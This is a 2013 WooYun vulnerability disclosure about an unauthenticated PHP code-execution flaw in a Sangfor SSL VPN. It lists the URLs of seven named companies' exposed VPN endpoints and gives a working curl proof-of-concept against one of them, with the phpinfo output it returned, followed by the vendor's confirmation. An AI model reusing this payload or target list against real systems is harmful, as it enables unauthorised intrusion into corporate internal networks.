当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025003

漏洞标题:宅急送等企业因某vpn设备造成内网泄密

相关厂商:宅急送

漏洞作者: 夜不眠

提交时间:2013-06-02 14:09

修复时间:2013-07-17 14:10

公开时间:2013-07-17 14:10

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-02: 细节已通知厂商并且等待厂商处理中
2013-06-03: 厂商已经确认,细节仅向厂商公开
2013-06-13: 细节向核心白帽子及相关领域专家公开
2013-06-23: 细节向普通白帽子公开
2013-07-03: 细节向实习白帽子公开
2013-07-17: 细节向公众公开

简要描述:

宅急送等企业某设备造成内网泄密包括些国企

详细说明:

http://vpn.zjs.com.cn:1000/cgi-bin/php-cgi/html/svpn.php 宅急送
http://220.231.41.220:1000/cgi-bin/php-cgi/html/svpn.php 中纺集团
https://61.163.104.181:4430/cgi-bin/php-cgi/html/svpn.php 郑州煤炭集团
http://sslvpn.cifi.com.cn:1000/cgi-bin/php-cgi/html/svpn.php 旭辉集团
http://60.216.53.122:1000/cgi-bin/php-cgi/html/svpn.php 山东浪潮
http://222.85.86.119:1000/cgi-bin/php-cgi/html/svpn.php 郑州日产
http://218.29.139.76:1000//cgi-bin/php-cgi/html/svpn.php 中原高速
原漏洞 http://wooyun.org/bugs/wooyun-2010-017323

漏洞证明:

curl http://vpn.zjs.com.cn:1000/cgi-bin/php-cgi/html/svpn.php -d 'cmd=phpinfo();'
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h2 {font-family: sans-serif;}
pre {margin: 0px; font-family: monospace;}
a:link {color: #000099; text-decoration: none; background-color: #ffffff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse;}
.center {text-align: center;}
.center table { margin-left: auto; margin-right: auto; text-align: left;}
.center th { text-align: center !important; }
td, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccccff; font-weight: bold; color: #000000;}
.h {background-color: #9999cc; font-weight: bold; color: #000000;}
.v {background-color: #cccccc; color: #000000;}
.vr {background-color: #cccccc; text-align: right; color: #000000;}
img {float: right; border: 0px;}
hr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}
</style>
<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><div class="center">
<table border="0" cellpadding="3" width="600">
<tr class="h"><td>
<a href="http://www.php.net/"><img border="0" src="/cgi-bin/php-cgi?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo" /></a><h1 class="p">PHP Version 5.3.2</h1>
</td></tr>
</table><br />
<table border="0" cellpadding="3" width="600">
<tr><td class="e">System </td><td class="v">Linux Sangfor 2.4.32-web100-bic #86 SMP Fri Apr 8 14:26:30 CST 2011 i686 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Mar 2 2013 11:57:29 </td></tr>
<tr><td class="e">Configure Command </td><td class="v"> &#039;./configure&#039; &#039;--disable-all&#039; &#039;--with-pcre-regex&#039; &#039;--enable-filter&#039; &#039;--enable-hash&#039; &#039;--enable-json&#039; &#039;--enable-posix&#039; &#039;--enable-session&#039; &#039;--enable-dba&#039; &#039;--enable-ftp&#039; &#039;--enable-sysvmsg&#039; &#039;--enable-sysvsem&#039; &#039;--enable-sysvshm&#039; &#039;--enable-pdo&#039; &#039;--enable-sockets&#039; &#039;--with-pdo-sqlite=/usr/local/sqlite3&#039; &#039;--with-qdbm=/usr/local/qdbm14&#039; &#039;--enable-inifile&#039; &#039;--with-gettext&#039; &#039;--with-iconv=/usr/local&#039; &#039;--enable-dom&#039; &#039;--enable-libxml&#039; &#039;--with-libxml-dir=/usr/local/libxml2&#039; &#039;--enable-mbstring=all&#039; &#039;--with-svpn_php=/usr/local/M50&#039; &#039;--with-strdes&#039; &#039;--with-curl&#039; &#039;--with-gd=/usr/local&#039; &#039;--enable-gd-native-ttf&#039; &#039;--with-freetype-dir=/usr/local&#039; &#039;--disable-cli&#039; &#039;--with-ldap=/usr/local/openldap&#039; &#039;--enable-pcntl&#039; &#039;--with-zlib-dir=/usr&#039; </td></tr>
<tr><td class="e">Server API </td><td class="v">CGI/FastCGI </td></tr>
<tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr>
<tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/usr/local/lib </td></tr>
<tr><td class="e">Loaded Configuration File </td><td class="v">/app/usr/local/lib/php.ini </td></tr>
<tr><td class="e">Scan this dir for additional .ini files </td><td class="v">(none) </td></tr>
<tr><td class="e">Additional .ini files parsed </td><td class="v">(none) </td></tr>
<tr><td class="e">PHP API </td><td class="v">20090626 </td></tr>
<tr><td class="e">PHP Extension </td><td class="v">20090626 </td></tr>
<tr><td class="e">Zend Extension </td><td class="v">220090626 </td></tr>
<tr><td class="e">Zend Extension Build </td><td class="v">API220090626,NTS </td></tr>
<tr><td class="e">PHP Extension Build </td><td class="v">API20090626,NTS </td></tr>
<tr><td class="e">Debug Build </td><td class="v">no </td></tr>
<tr><td class="e">Thread Safety </td><td class="v">disabled </td></tr>

修复方案:

Da Bu Ding

版权声明:转载请注明来源 夜不眠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-06-03 22:32

厂商回复:

CNVD确认并复现所述情况,为版本为升级所致(<=M5.6),已经在3日上午根据测试结果通报给设备生产厂商(深信服公司),由于相关客户未在CNCERT以往处置的政府或重要单位列表,将由CNCERT监督生产厂商做好用户应急响应工作。
按通用软件漏洞进行评分,rank 15。同时也请白帽子提供检测发现目标的方法,以便后续深入检测,谢谢。

最新状态:

暂无